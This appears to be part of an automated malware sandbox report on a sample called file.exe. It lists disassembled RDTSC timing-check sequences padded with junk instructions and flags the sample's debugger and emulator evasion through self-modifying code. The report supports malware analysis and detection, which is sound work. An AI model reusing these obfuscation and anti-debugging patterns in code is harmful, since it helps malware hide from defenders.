            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06CC second address: 52C06DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06DE second address: 52C0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F377C5325F1h 0x00000009 jmp 00007F377C5325EBh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F377C5325F8h 0x00000015 sbb ah, 00000078h 0x00000018 jmp 00007F377C5325EBh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 jns 00007F377C53263Ch 0x00000027 pushad 0x00000028 call 00007F377C5325EBh 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 popad 0x00000031 add eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0747 second address: 52C074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C074E second address: 52C0791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 241Ch 0x00000007 pushfd 0x00000008 jmp 00007F377C5325F5h 0x0000000d adc esi, 7E01A676h 0x00000013 jmp 00007F377C5325F1h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ecx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov esi, edi 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01E9 second address: 52B01F7 instructions: 0x00000000 rdtsc 0x00000002 mov ah, E9h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01F7 second address: 52B01FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01FB second address: 52B01FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B01FF second address: 52B0205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0205 second address: 52B020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B020B second address: 52B020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B020F second address: 52B02AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov cx, 3331h 0x0000000e pushfd 0x0000000f jmp 00007F377CE4798Eh 0x00000014 or cx, E308h 0x00000019 jmp 00007F377CE4798Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F377CE47996h 0x00000027 sub esp, 2Ch 0x0000002a pushad 0x0000002b movzx esi, di 0x0000002e mov si, bx 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F377CE47990h 0x0000003a jmp 00007F377CE47995h 0x0000003f popfd 0x00000040 mov eax, 69842137h 0x00000045 popad 0x00000046 mov dword ptr [esp], ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F377CE47999h 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02AE second address: 52B02BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325ECh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B02BE second address: 52B02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F377CE47993h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B038B second address: 52B03C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F377C5325EDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub edi, edi 0x0000000f jmp 00007F377C5325F7h 0x00000014 inc ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03C0 second address: 52B03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03C4 second address: 52B03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03C8 second address: 52B03CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03CE second address: 52B03EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 621Fh 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F377C5325EDh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03EB second address: 52B044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BFh 0x00000005 mov ax, 5BFFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F377CE47C35h 0x00000012 pushad 0x00000013 mov esi, 263FCBF7h 0x00000018 mov eax, 709B3093h 0x0000001d popad 0x0000001e lea ecx, dword ptr [ebp-14h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F377CE47994h 0x00000028 sbb ax, 7518h 0x0000002d jmp 00007F377CE4798Bh 0x00000032 popfd 0x00000033 mov di, si 0x00000036 popad 0x00000037 mov dword ptr [ebp-14h], edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F377CE4798Ch 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B044A second address: 52B0450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0450 second address: 52B0456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0456 second address: 52B045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04C6 second address: 52B04CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B04CC second address: 52B04D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0549 second address: 52B054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B054F second address: 52B055F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B055F second address: 52B0565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0565 second address: 52B05CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F377C5325F1h 0x00000009 adc al, 00000006h 0x0000000c jmp 00007F377C5325F1h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F377C5325F0h 0x00000018 jmp 00007F377C5325F5h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 jg 00007F37ECEA04B9h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F377C5325EDh 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B05CE second address: 52B05F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F377CE47A49h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F377CE4798Dh 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B05F8 second address: 52B0608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325ECh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0608 second address: 52B064B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-14h], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F377CE47991h 0x00000019 sub si, 9F36h 0x0000001e jmp 00007F377CE47991h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B064B second address: 52B0650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0650 second address: 52B0689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F377CE4798Dh 0x0000000a adc eax, 4C3BF096h 0x00000010 jmp 00007F377CE47991h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jne 00007F37ED7B57A4h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0689 second address: 52B068F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B068F second address: 52B06A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47991h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B06A4 second address: 52B06F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F377C5325F6h 0x00000014 or cl, 00000048h 0x00000017 jmp 00007F377C5325EBh 0x0000001c popfd 0x0000001d call 00007F377C5325F8h 0x00000022 pop ecx 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B06F2 second address: 52B0719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47990h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c pushad 0x0000000d mov esi, 5E38ED6Dh 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0719 second address: 52B071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B071D second address: 52B072E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B072E second address: 52B073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325ECh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B073E second address: 52B0742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0742 second address: 52B075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F377C5325EDh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B075A second address: 52B077F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F377CE4798Dh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B077F second address: 52B07C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ecx, 5EBF19C3h 0x00000010 mov di, si 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F377C5325EEh 0x0000001e sbb si, D888h 0x00000023 jmp 00007F377C5325EBh 0x00000028 popfd 0x00000029 push ecx 0x0000002a pop ebx 0x0000002b popad 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B07C6 second address: 52B0887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47995h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e pushfd 0x0000000f jmp 00007F377CE47996h 0x00000014 add ax, 4D48h 0x00000019 jmp 00007F377CE4798Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F377CE47990h 0x00000029 jmp 00007F377CE47995h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F377CE47990h 0x00000035 add eax, 0A398208h 0x0000003b jmp 00007F377CE4798Bh 0x00000040 popfd 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F377CE47992h 0x0000004c add si, A468h 0x00000051 jmp 00007F377CE4798Bh 0x00000056 popfd 0x00000057 mov bx, si 0x0000005a popad 0x0000005b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0887 second address: 52B089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325F0h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B089B second address: 52B08BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bl, al 0x0000000e jmp 00007F377CE47995h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0902 second address: 52B0908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0908 second address: 52B0959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F377CE47990h 0x00000009 xor si, C118h 0x0000000e jmp 00007F377CE4798Bh 0x00000013 popfd 0x00000014 call 00007F377CE47998h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov esi, eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F377CE4798Ch 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0959 second address: 52B002F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov ax, dx 0x00000010 pop edi 0x00000011 mov di, ax 0x00000014 popad 0x00000015 je 00007F37ECEA02C7h 0x0000001b xor eax, eax 0x0000001d jmp 00007F377C50BD1Ah 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop ebx 0x00000025 leave 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov edi, eax 0x0000002c cmp edi, 00000000h 0x0000002f setne al 0x00000032 xor ebx, ebx 0x00000034 test al, 01h 0x00000036 jne 00007F377C5325E7h 0x00000038 jmp 00007F377C5326D9h 0x0000003d call 00007F37812D9D60h 0x00000042 mov edi, edi 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F377C5325EAh 0x0000004b or cl, FFFFFF98h 0x0000004e jmp 00007F377C5325EBh 0x00000053 popfd 0x00000054 popad 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F377C5325ECh 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B002F second address: 52B0035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0035 second address: 52B013D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 push eax 0x00000012 pop edx 0x00000013 popad 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F377C5325F7h 0x0000001f xchg eax, ecx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F377C5325F4h 0x00000027 jmp 00007F377C5325F5h 0x0000002c popfd 0x0000002d push eax 0x0000002e pushfd 0x0000002f jmp 00007F377C5325F7h 0x00000034 jmp 00007F377C5325F3h 0x00000039 popfd 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F377C5325F4h 0x00000044 add si, 40D8h 0x00000049 jmp 00007F377C5325EBh 0x0000004e popfd 0x0000004f mov ebx, ecx 0x00000051 popad 0x00000052 xchg eax, ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jmp 00007F377C5325F7h 0x0000005b pushfd 0x0000005c jmp 00007F377C5325F8h 0x00000061 and esi, 3E488598h 0x00000067 jmp 00007F377C5325EBh 0x0000006c popfd 0x0000006d popad 0x0000006e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B013D second address: 52B0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47994h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0155 second address: 52B0184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], 55534552h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F377C5325F5h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0184 second address: 52B018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B018A second address: 52B018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B018E second address: 52B0192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0DBE second address: 52B0DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325ECh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0DCE second address: 52B0E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F377CE47996h 0x00000011 push eax 0x00000012 jmp 00007F377CE4798Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F377CE47995h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E1A second address: 52B0E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E20 second address: 52B0E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E24 second address: 52B0E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F377C5325F2h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E42 second address: 52B0E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75C7459Ch], 05h 0x00000010 pushad 0x00000011 mov edi, 78EF4966h 0x00000016 popad 0x00000017 je 00007F37ED7A5526h 0x0000001d pushad 0x0000001e mov ch, dl 0x00000020 pushfd 0x00000021 jmp 00007F377CE47994h 0x00000026 or si, 2108h 0x0000002b jmp 00007F377CE4798Bh 0x00000030 popfd 0x00000031 popad 0x00000032 pop ebp 0x00000033 pushad 0x00000034 mov ecx, 7A8DF09Bh 0x00000039 push eax 0x0000003a push edx 0x0000003b movzx esi, di 0x0000003e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C00F9 second address: 52C00FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C00FF second address: 52C0103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C9F second address: 52C0CE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 2A1BE641h 0x0000000e popad 0x0000000f xchg eax, esi 0x00000010 jmp 00007F377C5325ECh 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007F377C5325F7h 0x0000001e pop eax 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E0E second address: 52C0E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 mov ebx, 4A362D6Eh 0x0000000c pop edi 0x0000000d popad 0x0000000e cmp dword ptr [75C7459Ch], 05h 0x00000015 pushad 0x00000016 movzx esi, bx 0x00000019 pushad 0x0000001a movsx ebx, ax 0x0000001d mov ax, 241Bh 0x00000021 popad 0x00000022 popad 0x00000023 je 00007F37ED7ACFECh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F377CE4798Dh 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E46 second address: 52C0E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F377C5325EEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E71 second address: 52C0E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E75 second address: 52C0E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E7B second address: 52C0E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E81 second address: 52C0E85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0EEC second address: 52C0EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0EF0 second address: 52C0F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0F0C second address: 52C0F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6ED84C instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6ED4DE instructions caused by: Self-modifying code
